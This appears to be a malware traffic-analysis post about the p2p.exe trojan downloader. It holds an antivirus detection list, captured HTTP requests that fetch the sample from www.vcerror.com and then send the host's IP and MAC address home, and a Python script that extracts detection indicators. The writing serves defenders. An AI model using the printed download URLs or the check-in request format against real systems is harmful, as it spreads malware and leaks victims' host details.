
p2p.exe www.vcerror.com Malware Trojan Downloader Dropper PCAP file download traffic analysis

Attachment: p2p (pcap, 25 KB), added October 26, 2016 by admin
SHA256: ef794b9a3b72ae5524e17ecccf330eb16f2cc74f3e7fe7cb2667acefdea4b3a3
File name: p2p.exe
Detection ratio: 47 / 55
Analysis date: 2016-10-26 21:33:06 UTC

Antivirus        Result                                   Update
AVG              Generic37.DEP                            20161026
AVware           Trojan.Win32.Generic!BT                  20161026
Ad-Aware         Gen:Trojan.Heur.fmKfXCDIycnj             20161026
AegisLab         Troj.Dropper.W32.Injector!c              20161026
AhnLab-V3        Malware/Win32.Generic.N1843405561        20161026
Antiy-AVL        Trojan[Dropper]/Win32.Injector           20161026
Arcabit          Trojan.Heur.fmKfXCDIycnj                 20161026
Avast            Win32:Rofin-A [Trj]                      20161026
Avira (no cloud) TR/Crypt.FKM.Gen                         20161026
(only the first entries of the 55-engine report are reproduced here)

Relevant packets from the capture (tcpdump summary lines followed by the HTTP request line and headers; the raw packet byte dumps are omitted):

2016-10-25 23:20:18.175277 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /YW/p2p/p2p.exe HTTP/1.1
GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.vcerror.com
Connection: Keep-Alive

2016-10-25 23:20:18.419780 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [.], ack 2921, win 256, length 0

2016-10-25 23:20:26.821311 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [P.], seq 0:103, ack 1, win 256, length 103: HTTP: GET /YW/p2p/ver.dat HTTP/1.1
GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com
Connection: Keep-Alive

2016-10-25 23:20:26.823460 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6157, win 32754, length 0
2016-10-25 23:20:26.853146 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6754, win 32680, length 0
2016-10-25 23:20:27.116031 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [.], ack 318, win 255, length 0

2016-10-25 23:20:27.513843 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache

2016-10-25 23:20:27.850658 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [.], ack 1297, win 251, length 0

2016-10-25 23:20:30.265197 IP 192.168.1.102.61060 > 123.57.11.22.80: Flags [P.], seq 0:364, ack 1, win 256, length 364: HTTP: GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
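Added example, not part of the original post and not code from the sample: a small Python script that parses the four HTTP requests shown in the tcpdump output above, splits out the query parameters the implant sends home, and flags the check-in traits an analyst would key on. The request text is copied from the capture into a constructed string (no pcap parsing), and the indicator rules, the VMware OUI check and the function names are my own.

```python
"""Pull the check-in indicators out of the p2p.exe HTTP traffic.

Added example: the request text below is copied from the tcpdump output on
this page into a constructed string (no pcap parsing); the indicator rules
are my own, not something the post or the sample defines.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: request line plus the headers that matter, per request.
SAMPLE = """\
GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.vcerror.com

GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com

GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com

GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
"""

CAPTURE_SRC_IP = "192.168.1.102"   # source address of every flow in the capture
VMWARE_OUI = "000C29"              # 00:0C:29 is a VMware virtual-NIC OUI


def parse_requests(text):
    """Split raw HTTP request text into dicts: method, host, path, query, headers."""
    requests = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        method, target, _version = lines[0].split(" ", 2)
        url = urlsplit(target)
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append({
            "method": method,
            "host": headers.get("host", ""),
            "path": url.path,
            "query": dict(parse_qsl(url.query)),
            "headers": headers,
        })
    return requests


def decode_hex_ascii(value):
    """Return the printable ASCII text behind a hex string, or None if it is not one."""
    try:
        text = bytes.fromhex(value).decode("ascii")
    except ValueError:          # odd length, non-hex digit, or non-ASCII byte
        return None
    return text if text.isprintable() else None


def check_in_indicators(req):
    """Return the reasons a single request looks like implant check-in traffic."""
    reasons = []
    ua = req["headers"].get("user-agent", "")
    query = req["query"]
    if ua == "TestIE/1.0":
        reasons.append("non-browser User-Agent TestIE/1.0")
    if {"lip", "mac"}.issubset(query):
        reasons.append("host fingerprint in query string: lip=%s mac=%s"
                       % (query["lip"], query["mac"]))
        if query["lip"] != CAPTURE_SRC_IP:
            reasons.append("reported lip differs from capture source %s" % CAPTURE_SRC_IP)
        if query["mac"].upper().startswith(VMWARE_OUI):
            reasons.append("MAC OUI 00:0C:29 is VMware, sample ran in a VM")
    if "md5" in query:
        decoded = decode_hex_ascii(query["md5"])
        if decoded is not None:
            reasons.append("md5 parameter is hex-encoded ASCII: %s" % decoded)
    return reasons


def analyse(text):
    """Map each request path to its indicator list, in capture order."""
    return [(req["path"], check_in_indicators(req)) for req in parse_requests(text)]


if __name__ == "__main__":
    for path, reasons in analyse(SAMPLE):
        print(path, "->", "; ".join(reasons) or "no indicators")
```

Running analyse(SAMPLE) flags nothing on the initial download of p2p.exe (an ordinary IE8 User-Agent and Accept header), then the three check-ins: ver.dat with the bare TestIE/1.0 agent, and config.bin and hello.txt carrying ver, lip and mac. Two details fall out of the decode. First, the reported lip 192.168.32.132 is not the capture's source address 192.168.1.102, and the MAC OUI 00:0C:29 belongs to VMware; that is consistent with the sample having run in a NATed VM (my inference, the post does not say). Second, the md5 parameter is not a raw digest but the hex encoding of the ASCII string df0f503493e3b385, which has the length of half an MD5 hex digest; what it is a digest of is not shown here. For detection, the TestIE/1.0 User-Agent and the lip=/mac= pair in a GET query string are the cleanest network signatures in this capture.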